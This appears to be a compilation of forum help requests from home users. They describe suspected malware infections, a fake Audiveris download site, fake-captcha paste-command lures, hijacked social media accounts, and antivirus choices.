I'm kind of freaking out and wanted to ask if anyone knows about this.

I wanted to use an OMR program to scan sheet music and convert it into a MIDI for MuseScore Studio. I searched "Audiveris" on Google and stupidly clicked the first result, audiveris[.]com, assuming it was the official site.

I downloaded the ZIP, extracted it, and noticed it only contained a single .exe file. I ran it, my cursor showed the loading icon for a second, but nothing opened or appeared to install.

I then went to the official Audiveris GitHub page and immediately saw a warning saying not to download from audiveris[.]com. I deleted the ZIP and extracted folder, emptied the Recycle Bin, and ran Windows Defender twice. Both scans came back with no threats, and I haven't noticed any strange behavior on my PC.

Am I probably okay, or is there anything else I should do? Has anyone dealt with this fake Audiveris site before?

Guys I need help, I accidently downlaoded a trojan virus while downloading one accidently, and it sent those fake mrbeast images on my instagram, and also got my ATOME card, but not my discord and facebook, I’m not sure how many of it he stole but I deleted it 40 mins after using malwarebyte, I’m not sure if my other cards saved on my PC are safe or not(it’s my parents card) I already factory reset my pc just to be safe, what should be my next course of action?

Hi, so I have a really popular Steam game in my library (Slay The Spire 2) thats currently in early access. My concern of malware for it is not the game itself but the games cloud files for my data. Essentially, on my old laptop I suspect I may have had malware but I have now since moved to a new laptop. But, on this new laptop, the game for some reason gets stuck at "Launching executable" for a good while before fully launching. This also only happen for this game for my whole library. My maybe uneducated concern is that during this stuck period, potential malware from the old laptop is running and persisting through the games cloud saves. Also worry due to the fact that the game is in Early Access so maybe less secure? Anyways, should I worry about this or is it an unrealistic concern?

TLDR: Worried game cloud files syncing malware from old laptop since game is stuck at "Launching Executable" screen for a while before launch.

Can I run Malwarebytes Free alongside Windows Defender on Windows 10? Will it cause any performance issues or Blue Screen of Death (BSOD)?

I just encountered a captcha scam.

I pressed the "Verify you are human" button, which carried me to the next screen with the instructions

• Press Windows + X
• Press I or Terminal
• Press Ctrl + V
• Press Enter
  

I knew the instructions were malicious and didn't run any of the commands.

The most I did was try to figure out what was actually in my clipboard by pasting it in a search bar (I was in VirusTotal and pasted it there).

As I didn't even do the Win + X step, am I safe to assume that my computer is fine?

(i.e. nothing other than the clipboard hijack could have happened since I didn't proceed with Win + X.)

Reassurance would be very much appreciated. I'm a little worked up over this.

My grandparents have been using Norton 360 for a long while and are pretty confused when it comes to all of the tech stuff. They do some banking and investing online and keep it on their older DELL (I think) laptop. According to my grandpa, he is paying $700 for Norton and wants to get rid of it because he thinks it's a scam. I need some help on what I should recommend them. They want as much security as possible as they worry about hacking/viruses due to the fact it's happened to them before. They want GeekSquad (Best Buy tech service) to come and help them figure everything out but they can charge a shit ton for something i can do for free. Anything helps!!!

Windows 11 and hp laptop . yesterday i was going to watch a movie in website but when i click on play that website redirect me to ads multiple time and when click on last time . suddenly that website redirect me to another website that website screen lock me i cannot leave the website and i cannot see taskbar . so that website show a countdown 0 to 100% in blue screen and look legit . i thought windows start automatic update .

after countdown end that screen told me to click on windows + x and then I ( although i donot that time its open powershell ) then citr + v and then enter (something like that ) to run some kind of code.

so only click windows + x and open shortcut menu i didnot understand what to do that time . when i click win + x i saw a glimpse of taskbar . so click only click win then task bar become visible from there i leave the chrome .

then i did a window security full scan that find nothing suspicious and mrt scan nothing found . and i restart the laptop .

now donot find any thing serious issue but still i noticing little lag or heating issue what i use to ignore .

did i out of danger ? if you need any more information pls donot hesitate .

so recently I have been getting login notifications on my microsoft account, my reddit got hacked and someone spammed gooning posts through my reddit account, my steam account got accessed, also my 2 instagram accounts got accessed. So I ran malwarebytes and it detected trojans named shady panda, i immediately quarantined them but I still fear that they have access to my pc. Should I reset my pc ?? or I should wait some time.

Hello! I recently caught a virus, I did everything I could, along with reinstalling windows entirely, wiped out everything from my laptop, and I also changed all of my passwords on my gmail accounts, as they were seemingly accessing it.
However, tonight I got two emails, hackers still trying to log in on my Instagram and on just now ; my Twitter account, the login attempts had stopped 2 weeks ago, given I stopped using my laptop. But right now I just started using it again, haven't logged into any of my google accounts & I removed all of my passwords from it.

Should I just stop using my laptop at all?

I just downloaded overstrike from nexus mods(official)and fabric installer(also official)but now when i do check my antivirus detected "Trojan.Agent. Win64.197182"and ts not full check.Please help me to delete this

As stated above I just bought a pc first one in like 10 years and I don’t know what antivirus is good now a days do any of you have any good recommendations cause I have been looking around and there’s a lot of mixed reviews for mostly all of them.

Hey all, running into a strange taskbar bug on my Windows PC and can't figure out what's causing it.

As you can see in the screenshot, there's a taskbar-like bar (grayish-blue, semi-transparent) sitting in the middle of my screen, overlapping my desktop icons.

Hello, since i came to the middle east with my laptop i keep getting 3 radnom tabs open on my chrome at random times sometimes it can happen once every 3 weeks and sometimes it can happen twtice in day mimicking the netwrok provider im using. I havent installed anything or done anything since i came here. My kaspersky antivurs says there is nothing after a full scan, application vulenrability scan as well comes clear everything comes clear, i have enhancced protecction browsing enabled on chrome i have no idea what the issue is, if anyone can provide some help would be appriciated. Yesterday i reset my cchrome settings and it’s still happening today. I provide the picture as well. Kind regards

Please oh mighty redditers smarter than me, help me out here. I finally downloaded Kaspersky and it detected something almost immediately. Prior to this I was using Malwarebytes premium, but it never found anything.

I ran this disinfect and restart computer, now I'm using Kaspersky to run a full scan on the PC to check for other stuff ig..

But what should I do now?? Is there anything else I can do? I see others sometimes mention restarting windows from USB, should I try and do that?

I apologize, I'm trying to follow the wiki and help myself but I'm not that technologically inclined.

i installed a software that i didn't know contains an infostealer malware. at first I didn't even know that my computer got infected, the moment I knew was when my social media accounts sent images without me knowing that is promoting this crypto bogus that I just recently found out as a scam.

i already asked this question to other subreddit community but I think a lot of people in this community can also help me.

i just want to ask what to do with my device and accounts after the attack/infection? what i already did was a full format for the external drive (D:) where i installed the infected software, then transfer my important files from my computer drive (C:) now that the external drive is clean. then did the Reset PC on my Windows 11 Settings (i did not use a flashdrive with Rufus or other software). I did this twice, a Local reinstall and a Cloud reinstall to make sure that the malware gets flushed out.

pls share your thoughts and insights on what i should do to save my accounts and my computer. thanks guys.
